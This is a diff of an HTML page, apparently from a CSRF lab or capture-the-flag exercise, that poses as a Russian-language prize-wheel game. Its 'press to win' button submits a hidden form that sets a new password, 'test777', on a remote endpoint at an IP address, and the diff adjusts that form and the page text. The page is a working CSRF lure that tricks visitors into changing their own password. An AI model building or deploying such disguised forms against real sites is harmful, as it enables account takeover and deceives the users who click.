--- a/csrf/index.html
+++ b/csrf/index.html
@@ -13,11 +13,12 @@
     <div id="MainBlock"> 
 
 <div id="Header"><h1 id="HeaderText">Ай-нанэ-нанэ! Аттракцион невиданной щедрости!!! </h1>  <h2 id="HeaderSmallText">Испытай своую удачу вместе с нами!</h2> 
-    <h3 id="SpinDrumText"> Скорее крутите барабан! Зрители ждут! </h3> <h3 id="SoSorryText">Очень жаль. вы проиграли, а ваше очко уходит в зрительный зал =(  </h3></div>
+    <h3 id="SpinDrumText"> Скорее крутите барабан! Зрители ждут! </h3> <h3 id="SoSorryText">Очень жаль. вы проиграли, а ваше очко ушло в зрительный зал =(  </h3></div>
     <div id="ArrowDown">  </div>
     <div id="DrumBlock"> </div>
-    <form method="GET"  action="http://178.172.195.18:11166/csrf/index.php"><input class="form-control" width="1px" placeholder="New Password" name="newPass" value="test777" display="none"> <button type="submit" id="Button"><img src="rainbow.png"> Нажми чтобы выиграть! </button></form>
-    <div> </div>
+    <form id="form" target="_blank" method="GET"  action="http://178.172.195.18:11166/csrf/index.php"><input class="form-control" width="1px" placeholder="New Password" target="_blank" name="newPass" value="test777" display="none"> 
+        <button id="Button"><img src="rainbow.png"> Нажми чтобы выиграть! </button></form>
+    <div> </div> 
 
     
 
